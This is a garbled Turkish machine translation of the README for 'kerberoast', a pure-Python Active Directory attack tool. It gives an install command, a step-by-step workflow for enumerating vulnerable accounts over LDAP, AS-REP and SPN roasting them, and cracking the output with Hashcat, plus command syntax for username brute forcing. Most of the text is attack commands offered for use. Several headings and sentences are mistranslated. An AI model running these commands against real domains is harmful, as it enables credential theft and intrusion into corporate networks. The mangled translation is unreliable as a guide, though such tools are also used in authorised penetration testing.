Kerberoast - Kerberoast Saldırısı -Saf Python

Düzenlemek

pip3 install kerberoast

önkoşullar

Python 3.6 Bkz. gereksinimler.txt

ÖNEMLİ: LDAP ve için kabul edilen hedef url biçimleri Kerberos şunlardır:
<ldap_connection_url>: <protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>
<kerberos_connection_url>: <protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>

Adımlar -SSPI ile-: kerberoast auto <DC_ip>

Adımlar -SSPI kullanılmıyor-:

1. arayın savunmasız LDAP aracılığıyla kullanıcıları
   kerberoast ldap all <ldap_connection_url> -o ldapenum
2. Kullanıcılara karşı ASREP kızartma kullanın. ldapenum_asrep_users.txtdosya
   kerberoast asreproast <DC_ip> -t ldapenum_asrep_users.txt
3. Kullanıcılara karşı SPN kızartma kullanın. ldapenum_spn_users.txtdosya
   kerberoast spnroast <kerberos_connection_url> -t ldapenum_spn_users.txt
4. Hashcat ile Crack SPN kızartma ve ASPREP kızartma çıktısı

Komutlar

ldap

Bu komut grubu, potansiyel olarak savunmasız kullanıcıları LDAP aracılığıyla numaralandırmak içindir.

komut yapısı

    kerberoast ldap <type> <ldap_connection_url> <options>

Type: Numaralandırılacak üç tür kullanıcıyı destekler

1. spnile kullanıcıları numaralandırır servicePrincipalNameöznitelik kümesi.
2. asrepile kullanıcıları numaralandırır DONT_REQ_PREAUTHUAC özniteliklerinde bayrak seti.
3. allYukarıda belirtilen tüm numaralandırmaları başlatır.

ldap_connection_url: Kullanıcı kimlik bilgilerini ve hedef sunucuyu msldap url biçiminde belirtir (yardıma bakın)

options:
    -o: Çıktı dosyası temel adı

kaba

Bu komut, uygulayarak gerçekleştirmek içindir. kullanıcı adı numaralandırmasını kerberos hizmetini olası kullanıcı adı adaylarıyla kaba kuvvet

komut yapısı

    kerberoast brute <realm> <dc_ip> <targets> <options>

realm: Kerberos alemi genellikle COMPANY.corp
dc_ip: Etki alanı denetleyicisinin IP veya ana bilgisayar adı
targets: Olası kullanıcı adı adaylarını içeren dosyanın yolu
options:
    -o: Çıktı dosyası temel adı

komut yapısı

    kerberoast asreproast <dc_ip> <options>

dc_ip: Etki alanı denetleyicisinin IP veya ana bilgisayar adı
options:
    -r: Kullanılacak kerberos bölgesini belirtir. Diğer tüm bölge bilgilerini geçersiz kılar.
    -o: Çıktı dosyası temel adı
    -t: içeren dosyanın yolu kullanıcı adlarını Saldırının gerçekleştirileceği
    -u: Saldırının gerçekleştirileceği kullanıcıyı belirtir. Biçim <username>veya <username>@<realm>ama ilk durumda, -rbölge belirtmek için seçenek kullanılmalıdır

kavrulmuş

Bu komut, SPNroast (AKA kerberoast) saldırısı gerçekleştirmek içindir.

komut yapısı

    kerberoast spnroast <kerberos_connection_url> <options>

kerberos_connection_url: Kullanıcı kimlik bilgilerini ve hedef sunucuyu kerberos URL biçiminde belirtir (yardıma bakın)

options:
    -r: Kullanılacak kerberos bölgesini belirtir. Diğer tüm bölge bilgilerini geçersiz kılar.
    -o: Çıktı dosyası temel adı
    -t: Saldırının gerçekleştirileceği kullanıcı adlarını içeren dosyanın yolu
    -u: Saldırının gerçekleştirileceği kullanıcıyı belirtir. Biçim <username>veya <username>@<realm>ama ilk durumda, -rbölge belirtmek için seçenek kullanılmalıdır

Kerberoast'ı indirin